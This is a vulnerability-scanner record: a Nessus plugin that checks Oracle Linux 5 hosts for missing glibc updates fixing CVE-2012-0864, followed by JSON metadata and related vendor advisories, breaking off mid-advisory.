ID ORACLELINUX_ELSA-2012-0397.NASL Type nessus Reporter This script is Copyright (C) 2013-2020 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2013-07-12T00:00:00
Description
From Red Hat Security Advisory 2012:0397 :
Updated glibc packages that fix one security issue are now available
for Red Hat Enterprise Linux 5.
The Red Hat Security Response Team has rated this update as having
moderate security impact. A Common Vulnerability Scoring System (CVSS)
base score, which gives a detailed severity rating, is available from
the CVE link in the References section.
The glibc packages provide the standard C and standard math libraries
used by multiple programs on the system. Without these libraries, the
Linux system cannot function correctly.
An integer overflow flaw was found in the implementation of the printf
functions family. This could allow an attacker to bypass
FORTIFY_SOURCE protections and execute arbitrary code using a format
string flaw in an application, even though these protections are
expected to limit the impact of such flaws to an application abort.
(CVE-2012-0864)
All users of glibc are advised to upgrade to these updated packages,
which contain a patch to resolve this issue.
#%NASL_MIN_LEVEL 80502
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Red Hat Security Advisory RHSA-2012:0397 and
# Oracle Linux Security Advisory ELSA-2012-0397 respectively.
#
include("compat.inc");
if (description)
{
  # Metadata-only branch: every call below declares a plugin attribute, and the
  # closing exit(0) returns before any of the host checks further down can run.

  # Plugin identity and revision.
  script_id(68498);
  script_version("1.8");
  script_set_attribute(attribute:"plugin_modification_date", value:"2020/09/24");

  # Identifiers of the vulnerability and the vendor advisory this check tracks.
  script_cve_id("CVE-2012-0864");
  script_bugtraq_id(52201);
  script_xref(name:"RHSA", value:"2012:0397");

  script_name(english:"Oracle Linux 5 : glibc (ELSA-2012-0397)");
  script_summary(english:"Checks rpm output for the updated packages");

  script_set_attribute(attribute:"synopsis", value:"The remote Oracle Linux host is missing one or more security updates.");

  # The advisory text is one multi-line string literal. Its continuation lines
  # start at column 0 so that no extra whitespace becomes part of the value.
  script_set_attribute(
    attribute:"description",
    value:
"From Red Hat Security Advisory 2012:0397 :
Updated glibc packages that fix one security issue are now available
for Red Hat Enterprise Linux 5.
The Red Hat Security Response Team has rated this update as having
moderate security impact. A Common Vulnerability Scoring System (CVSS)
base score, which gives a detailed severity rating, is available from
the CVE link in the References section.
The glibc packages provide the standard C and standard math libraries
used by multiple programs on the system. Without these libraries, the
Linux system cannot function correctly.
An integer overflow flaw was found in the implementation of the printf
functions family. This could allow an attacker to bypass
FORTIFY_SOURCE protections and execute arbitrary code using a format
string flaw in an application, even though these protections are
expected to limit the impact of such flaws to an application abort.
(CVE-2012-0864)
All users of glibc are advised to upgrade to these updated packages,
which contain a patch to resolve this issue."
  );
  script_set_attribute(attribute:"see_also", value:"https://oss.oracle.com/pipermail/el-errata/2012-March/002705.html");
  script_set_attribute(attribute:"solution", value:"Update the affected glibc packages.");

  # CVSS v2 base vector: network access vector, medium access complexity, no
  # authentication, partial confidentiality / integrity / availability impact.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P");
  # CVSS v2 temporal vector: exploitability unproven (E:U), official fix
  # available (RL:OF), report confirmed (RC:C).
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
  # NOTE(review): the exploitability fields are static plugin metadata. The
  # aggregated reference list for CVE-2012-0864 that accompanies this plugin
  # includes exploit-tracker entry types (zdt, exploitpack, seebug), so confirm
  # the current status before using "false" / E:U for patch prioritisation.
  script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"false");

  # Declared as a local check; the host-side code works from the KB keys
  # listed in script_require_keys() below.
  script_set_attribute(attribute:"plugin_type", value:"local");

  # CPE names: one per package covered by the advisory, plus the OS release.
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:glibc");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:glibc-common");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:glibc-devel");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:glibc-headers");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:glibc-utils");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:nscd");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:oracle:linux:5");

  # NOTE(review): vuln_publication_date (2013/05/02) is later than
  # patch_publication_date (2012/03/20). It matches the publication timestamp
  # of the CVE record, so do not read it as the date the flaw was first
  # disclosed; the fix shipped more than a year earlier.
  script_set_attribute(attribute:"vuln_publication_date", value:"2013/05/02");
  script_set_attribute(attribute:"patch_publication_date", value:"2012/03/20");
  script_set_attribute(attribute:"plugin_publication_date", value:"2013/07/12");
  script_set_attribute(attribute:"generated_plugin", value:"current");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2013-2020 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"Oracle Linux Local Security Checks");

  # Declared dependency and required KB keys. Presumably ssh_get_info.nasl is
  # what populates these keys -- verify against that plugin.
  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/OracleLinux", "Host/RedHat/release", "Host/RedHat/rpm-list");

  exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("rpm.inc");
# Host-side check. Each audit() call reports why the plugin does not apply.
# The statements that follow an audit() assume it ended the script (os_ver is
# indexed right after its isnull() test) -- NOTE(review): confirm in audit.inc.
#
# Scope note: the verdict is derived only from KB items (release string, cpu,
# RPM list). It compares package versions and does not examine running
# processes, so it cannot tell whether services were restarted after an update.

# Preconditions: local checks are enabled and the host is flagged Oracle Linux.
if (!get_kb_item("Host/local_checks_enabled"))
  audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/OracleLinux"))
  audit(AUDIT_OS_NOT, "Oracle Linux");

# The release string must name Oracle Linux and carry a parsable version.
release = get_kb_item("Host/RedHat/release");
if (isnull(release) || !pregmatch(pattern: "Oracle (?:Linux Server|Enterprise Linux)", string:release))
  audit(AUDIT_OS_NOT, "Oracle Linux");

os_ver = pregmatch(pattern: "Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\.[0-9]+)?)", string:release);
if (isnull(os_ver))
  audit(AUDIT_UNKNOWN_APP_VER, "Oracle Linux");
# Keep only capture group 1, the "major[.minor]" version text.
os_ver = os_ver[1];

# Accept major version 5 only: "5" or "5.<minor>", but not e.g. "50".
if (! preg(pattern:"^5([^0-9]|$)", string:os_ver))
  audit(AUDIT_OS_NOT, "Oracle Linux 5", "Oracle Linux " + os_ver);

if (!get_kb_item("Host/RedHat/rpm-list"))
  audit(AUDIT_PACKAGE_LIST_MISSING);

# Architecture gate: the check proceeds only for x86_64, ia64 or i386-i686.
cpu = get_kb_item("Host/cpu");
if (isnull(cpu))
  audit(AUDIT_UNKNOWN_ARCH);
if ("x86_64" >!< cpu && "ia64" >!< cpu && cpu !~ "^i[3-6]86$")
  audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Oracle Linux", cpu);

# Fixed package builds named by the advisory, tested in this order.
# rpm_check() presumably returns true when the installed package is older
# than the reference -- verify against rpm.inc.
el5_fixed_pkgs = make_list(
  "glibc-2.5-81.el5_8.1",
  "glibc-common-2.5-81.el5_8.1",
  "glibc-devel-2.5-81.el5_8.1",
  "glibc-headers-2.5-81.el5_8.1",
  "glibc-utils-2.5-81.el5_8.1",
  "nscd-2.5-81.el5_8.1"
);

flag = 0;
foreach fixed_ref (el5_fixed_pkgs)
{
  if (rpm_check(release:"EL5", reference:fixed_ref))
    flag++;
}

# At least one package matched: report, attaching the RPM details when the
# verbosity setting asks for them, then stop.
if (flag)
{
  if (report_verbosity > 0)
    security_warning(port:0, extra:rpm_report_get());
  else
    security_warning(0);
  exit(0);
}

# No rpm_check() fired. Distinguish "packages were tested and are not
# affected" from "none of the packages were found to test".
tested = pkg_tests_get();
if (tested)
  audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
else
  audit(AUDIT_PACKAGE_NOT_INSTALLED, "glibc / glibc-common / glibc-devel / glibc-headers / glibc-utils / etc");
{"id": "ORACLELINUX_ELSA-2012-0397.NASL", "bulletinFamily": "scanner", "title": "Oracle Linux 5 : glibc (ELSA-2012-0397)", "description": "From Red Hat Security Advisory 2012:0397 :\n\nUpdated glibc packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nThe glibc packages provide the standard C and standard math libraries\nused by multiple programs on the system. Without these libraries, the\nLinux system cannot function correctly.\n\nAn integer overflow flaw was found in the implementation of the printf\nfunctions family. This could allow an attacker to bypass\nFORTIFY_SOURCE protections and execute arbitrary code using a format\nstring flaw in an application, even though these protections are\nexpected to limit the impact of such flaws to an application abort.\n(CVE-2012-0864)\n\nAll users of glibc are advised to upgrade to these updated packages,\nwhich contain a patch to resolve this issue.", "published": "2013-07-12T00:00:00", "modified": "2013-07-12T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/68498", "reporter": "This script is Copyright (C) 2013-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.", "references": ["https://oss.oracle.com/pipermail/el-errata/2012-March/002705.html"], "cvelist": ["CVE-2012-0864"], "type": "nessus", "lastseen": "2020-09-25T08:55:15", "edition": 20, "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2012-0864"]}, {"type": "centos", "idList": ["CESA-2012:0393", "CESA-2012:0397"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0397", "ELSA-2012-0393"]}, {"type": "amazon", "idList": ["ALAS-2012-057"]}, {"type": "redhat", "idList": ["RHSA-2012:0488", "RHSA-2012:0393", "RHSA-2012:0397", "RHSA-2012:0531"]}, {"type": "nessus", "idList": ["FEDORA_2012-2144.NASL", "FEDORA_2012-2123.NASL", "REDHAT-RHSA-2012-0393.NASL", "REDHAT-RHSA-2012-0397.NASL", "CENTOS_RHSA-2012-0397.NASL", "FEDORA_2012-2162.NASL", "SL_20120319_GLIBC_ON_SL5_X.NASL", "ALA_ALAS-2012-57.NASL", "ORACLELINUX_ELSA-2012-0393.NASL", "CENTOS_RHSA-2012-0393.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310123952", "OPENVAS:1361412562310881113", "OPENVAS:1361412562310881169", "OPENVAS:864432", "OPENVAS:1361412562310863924", "OPENVAS:1361412562310870673", "OPENVAS:1361412562310123951", "OPENVAS:863924", "OPENVAS:870673", "OPENVAS:1361412562310120410"]}, {"type": "fedora", "idList": ["FEDORA:7635A20E7B", "FEDORA:3722721573", "FEDORA:A7A8121248", "FEDORA:71D9321EDD"]}, {"type": "zdt", "idList": ["1337DAY-ID-20717"]}, {"type": "seebug", "idList": ["SSV:78801"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:D0C0ABEBB66F120575911D213A03B73B"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12241", "SECURITYVULNS:DOC:27743", "SECURITYVULNS:DOC:28907"]}, {"type": "gentoo", "idList": ["GLSA-201312-01"]}, {"type": "ubuntu", "idList": ["USN-1396-1"]}, {"type": "vmware", "idList": ["VMSA-2012-0018", "VMSA-2012-0013"]}], "modified": "2020-09-25T08:55:15", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2020-09-25T08:55:15", "rev": 2}, "vulnersScore": 7.0}, "sourceData": 
"#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2012:0397 and \n# Oracle Linux Security Advisory ELSA-2012-0397 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(68498);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/24\");\n\n script_cve_id(\"CVE-2012-0864\");\n script_bugtraq_id(52201);\n script_xref(name:\"RHSA\", value:\"2012:0397\");\n\n script_name(english:\"Oracle Linux 5 : glibc (ELSA-2012-0397)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2012:0397 :\n\nUpdated glibc packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nThe glibc packages provide the standard C and standard math libraries\nused by multiple programs on the system. Without these libraries, the\nLinux system cannot function correctly.\n\nAn integer overflow flaw was found in the implementation of the printf\nfunctions family. 
This could allow an attacker to bypass\nFORTIFY_SOURCE protections and execute arbitrary code using a format\nstring flaw in an application, even though these protections are\nexpected to limit the impact of such flaws to an application abort.\n(CVE-2012-0864)\n\nAll users of glibc are advised to upgrade to these updated packages,\nwhich contain a patch to resolve this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2012-March/002705.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected glibc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/05/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/03/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 
script_copyright(english:\"This script is Copyright (C) 2013-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"glibc-2.5-81.el5_8.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"glibc-common-2.5-81.el5_8.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"glibc-devel-2.5-81.el5_8.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"glibc-headers-2.5-81.el5_8.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"glibc-utils-2.5-81.el5_8.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"nscd-2.5-81.el5_8.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-devel / glibc-headers / glibc-utils / etc\");\n}\n", "naslFamily": "Oracle Linux Local Security Checks", "pluginID": "68498", "cpe": ["p-cpe:/a:oracle:linux:nscd", "cpe:/o:oracle:linux:5", "p-cpe:/a:oracle:linux:glibc-devel", "p-cpe:/a:oracle:linux:glibc-utils", "p-cpe:/a:oracle:linux:glibc-headers", "p-cpe:/a:oracle:linux:glibc-common", "p-cpe:/a:oracle:linux:glibc"], "scheme": null}
{"cve": [{"lastseen": "2020-10-03T12:06:00", "description": "Integer overflow in the vfprintf function in stdio-common/vfprintf.c in glibc 2.14 and other versions allows context-dependent attackers to bypass the FORTIFY_SOURCE protection mechanism, conduct format string attacks, and write to arbitrary memory via a large number of arguments.", "edition": 3, "cvss3": {}, "published": "2013-05-02T14:55:00", "title": "CVE-2012-0864", "type": "cve", "cwe": ["CWE-189"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0864"], "modified": "2013-05-03T04:00:00", "cpe": ["cpe:/a:gnu:glibc:2.14"], "id": "CVE-2012-0864", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0864", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:gnu:glibc:2.14:*:*:*:*:*:*:*"]}], "centos": [{"lastseen": "2019-12-20T18:28:55", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0864"], "description": "**CentOS Errata and Security Advisory** CESA-2012:0397\n\n\nThe glibc packages provide the standard C and standard math libraries used\nby multiple programs on the system. Without these libraries, the Linux\nsystem cannot function correctly.\n\nAn integer overflow flaw was found in the implementation of the printf\nfunctions family. This could allow an attacker to bypass FORTIFY_SOURCE\nprotections and execute arbitrary code using a format string flaw in an\napplication, even though these protections are expected to limit the impact\nof such flaws to an application abort. 
(CVE-2012-0864)\n\nAll users of glibc are advised to upgrade to these updated packages, which\ncontain a patch to resolve this issue.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2012-March/030544.html\n\n**Affected packages:**\nglibc\nglibc-common\nglibc-devel\nglibc-headers\nglibc-utils\nnscd\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2012-0397.html", "edition": 3, "modified": "2012-03-20T02:12:41", "published": "2012-03-20T02:12:41", "href": "http://lists.centos.org/pipermail/centos-announce/2012-March/030544.html", "id": "CESA-2012:0397", "title": "glibc, nscd security update", "type": "centos", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-20T18:27:41", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0864"], "description": "**CentOS Errata and Security Advisory** CESA-2012:0393\n\n\nThe glibc packages provide the standard C and standard math libraries used\nby multiple programs on the system. Without these libraries, the Linux\nsystem cannot function correctly.\n\nAn integer overflow flaw was found in the implementation of the printf\nfunctions family. This could allow an attacker to bypass FORTIFY_SOURCE\nprotections and execute arbitrary code using a format string flaw in\nan application, even though these protections are expected to limit the\nimpact of such flaws to an application abort. (CVE-2012-0864)\n\nThis update also fixes the following bugs:\n\n* Previously, the dynamic loader generated an incorrect ordering for\ninitialization according to the ELF specification. This could result in\nincorrect ordering of DSO constructors and destructors. With this update,\ndependency resolution has been fixed. (BZ#783999)\n\n* Previously, locking of the main malloc arena was incorrect in the retry\npath. This could result in a deadlock if an sbrk request failed. With this\nupdate, locking of the main arena in the retry path has been fixed. 
This\nissue was exposed by a bug fix provided in the RHSA-2012:0058 update.\n(BZ#795328)\n\n* Calling memcpy with overlapping arguments on certain processors would\ngenerate unexpected results. While such code is a clear violation of\nANSI/ISO standards, this update restores prior memcpy behavior. (BZ#799259)\n\nAll users of glibc are advised to upgrade to these updated packages, which\ncontain patches to resolve these issues.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2012-March/030541.html\n\n**Affected packages:**\nglibc\nglibc-common\nglibc-devel\nglibc-headers\nglibc-static\nglibc-utils\nnscd\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2012-0393.html", "edition": 3, "modified": "2012-03-15T22:58:20", "published": "2012-03-15T22:58:20", "href": "http://lists.centos.org/pipermail/centos-announce/2012-March/030541.html", "id": "CESA-2012:0393", "title": "glibc, nscd security update", "type": "centos", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:34:07", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0864"], "description": "[2.5-81.el5_8.1]\n- Add dist tag\n[when building file lists (#784646).]\n- Avoid nargs integer overflow which could be used to bypass FORTIFY_SOURCE (#794813)", "edition": 4, "modified": "2012-03-19T00:00:00", "published": "2012-03-19T00:00:00", "id": "ELSA-2012-0397", "href": "http://linux.oracle.com/errata/ELSA-2012-0397.html", "title": "glibc security update", "type": "oraclelinux", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:15", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0864"], "description": "[2.12-1.47.el6_2.9]\n- Always use another area after a failed allocation in the\n main arena (#795328)\n - Remove sse3 memcpy (#695812) changes (#799259)\n[2.12-1.47.el6_2.8]\n- Avoid nargs integer overflow which could be used to bypass FORTIFY_SOURCE 
(#794815)\n[2.12-1.47.el6_2.7]\n- Fix locking on malloc family retry paths (#795328)\n[2.12-1.47.el6_2.6]\n- Fix cycle detection in dynamic loader (#783999)", "edition": 4, "modified": "2012-03-15T00:00:00", "published": "2012-03-15T00:00:00", "id": "ELSA-2012-0393", "href": "http://linux.oracle.com/errata/ELSA-2012-0393.html", "title": "glibc security and bug fix update", "type": "oraclelinux", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "amazon": [{"lastseen": "2020-11-10T12:37:10", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0864"], "description": "**Issue Overview:**\n\nAn integer overflow flaw was found in the implementation of the printf functions family. This could allow an attacker to bypass FORTIFY_SOURCE protections and execute arbitrary code using a format string flaw in an application, even though these protections are expected to limit the impact of such flaws to an application abort. ([CVE-2012-0864 __](<https://access.redhat.com/security/cve/CVE-2012-0864>))\n\n \n**Affected Packages:** \n\n\nglibc\n\n \n**Issue Correction:** \nRun _yum update glibc_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n glibc-static-2.12-1.47.37.amzn1.i686 \n glibc-debuginfo-common-2.12-1.47.37.amzn1.i686 \n glibc-utils-2.12-1.47.37.amzn1.i686 \n glibc-devel-2.12-1.47.37.amzn1.i686 \n glibc-2.12-1.47.37.amzn1.i686 \n glibc-common-2.12-1.47.37.amzn1.i686 \n glibc-headers-2.12-1.47.37.amzn1.i686 \n glibc-debuginfo-2.12-1.47.37.amzn1.i686 \n nscd-2.12-1.47.37.amzn1.i686 \n \n src: \n glibc-2.12-1.47.37.amzn1.src \n \n x86_64: \n nscd-2.12-1.47.37.amzn1.x86_64 \n glibc-devel-2.12-1.47.37.amzn1.x86_64 \n glibc-debuginfo-common-2.12-1.47.37.amzn1.x86_64 \n glibc-2.12-1.47.37.amzn1.x86_64 \n glibc-headers-2.12-1.47.37.amzn1.x86_64 \n glibc-debuginfo-2.12-1.47.37.amzn1.x86_64 \n glibc-static-2.12-1.47.37.amzn1.x86_64 \n glibc-utils-2.12-1.47.37.amzn1.x86_64 \n glibc-common-2.12-1.47.37.amzn1.x86_64 \n \n \n", "edition": 4, "modified": 
"2012-03-23T14:15:00", "published": "2012-03-23T14:15:00", "id": "ALAS-2012-057", "href": "https://alas.aws.amazon.com/ALAS-2012-57.html", "title": "Medium: glibc", "type": "amazon", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2019-08-13T18:46:45", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0864"], "description": "The glibc packages provide the standard C and standard math libraries used\nby multiple programs on the system. Without these libraries, the Linux\nsystem cannot function correctly.\n\nAn integer overflow flaw was found in the implementation of the printf\nfunctions family. This could allow an attacker to bypass FORTIFY_SOURCE\nprotections and execute arbitrary code using a format string flaw in an\napplication, even though these protections are expected to limit the impact\nof such flaws to an application abort. (CVE-2012-0864)\n\nAll users of glibc are advised to upgrade to these updated packages, which\ncontain a patch to resolve this issue.\n", "modified": "2017-09-08T12:14:35", "published": "2012-03-19T04:00:00", "id": "RHSA-2012:0397", "href": "https://access.redhat.com/errata/RHSA-2012:0397", "type": "redhat", "title": "(RHSA-2012:0397) Moderate: glibc security update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:46:35", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0864"], "description": "The glibc packages provide the standard C and standard math libraries used\nby multiple programs on the system. Without these libraries, the Linux\nsystem cannot function correctly.\n\nAn integer overflow flaw was found in the implementation of the printf\nfunctions family. This could allow an attacker to bypass FORTIFY_SOURCE\nprotections and execute arbitrary code using a format string flaw in\nan application, even though these protections are expected to limit the\nimpact of such flaws to an application abort. 
(CVE-2012-0864)\n\nThis update also fixes the following bugs:\n\n* Previously, the dynamic loader generated an incorrect ordering for\ninitialization according to the ELF specification. This could result in\nincorrect ordering of DSO constructors and destructors. With this update,\ndependency resolution has been fixed. (BZ#783999)\n\n* Previously, locking of the main malloc arena was incorrect in the retry\npath. This could result in a deadlock if an sbrk request failed. With this\nupdate, locking of the main arena in the retry path has been fixed. This\nissue was exposed by a bug fix provided in the RHSA-2012:0058 update.\n(BZ#795328)\n\n* Calling memcpy with overlapping arguments on certain processors would\ngenerate unexpected results. While such code is a clear violation of\nANSI/ISO standards, this update restores prior memcpy behavior. (BZ#799259)\n\nAll users of glibc are advised to upgrade to these updated packages, which\ncontain patches to resolve these issues.\n", "modified": "2018-06-06T20:24:36", "published": "2012-03-15T04:00:00", "id": "RHSA-2012:0393", "href": "https://access.redhat.com/errata/RHSA-2012:0393", "type": "redhat", "title": "(RHSA-2012:0393) Moderate: glibc security and bug fix update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:44:34", "bulletinFamily": "unix", "cvelist": ["CVE-2011-3045", "CVE-2011-4128", "CVE-2012-0864", "CVE-2012-0884", "CVE-2012-1165", "CVE-2012-1569", "CVE-2012-1573", "CVE-2012-1583"], "description": "The rhev-hypervisor5 package provides a Red Hat Enterprise Virtualization\nHypervisor ISO disk image. The Red Hat Enterprise Virtualization Hypervisor\nis a dedicated Kernel-based Virtual Machine (KVM) hypervisor. 
It includes\neverything necessary to run and manage virtual machines: A subset of the\nRed Hat Enterprise Linux operating environment and the Red Hat Enterprise\nVirtualization Agent.\n\nNote: Red Hat Enterprise Virtualization Hypervisor is only available for\nthe Intel 64 and AMD64 architectures with virtualization extensions.\n\nA flaw was found in the way libtasn1 decoded DER data. An attacker could\ncreate a carefully-crafted X.509 certificate that, when parsed by an\napplication that uses GnuTLS, could cause the application to crash.\n(CVE-2012-1569)\n\nA flaw was found in the way GnuTLS decrypted malformed TLS records. This\ncould cause a TLS/SSL client or server to crash when processing a\nspecially-crafted TLS record from a remote TLS/SSL connection peer.\n(CVE-2012-1573)\n\nAn integer overflow flaw was found in the implementation of the printf\nfunctions family. This could allow an attacker to bypass FORTIFY_SOURCE\nprotections and execute arbitrary code using a format string flaw in an\napplication, even though these protections are expected to limit the\nimpact of such flaws to an application abort. (CVE-2012-0864)\n\nRed Hat would like to thank Matthew Hall of Mu 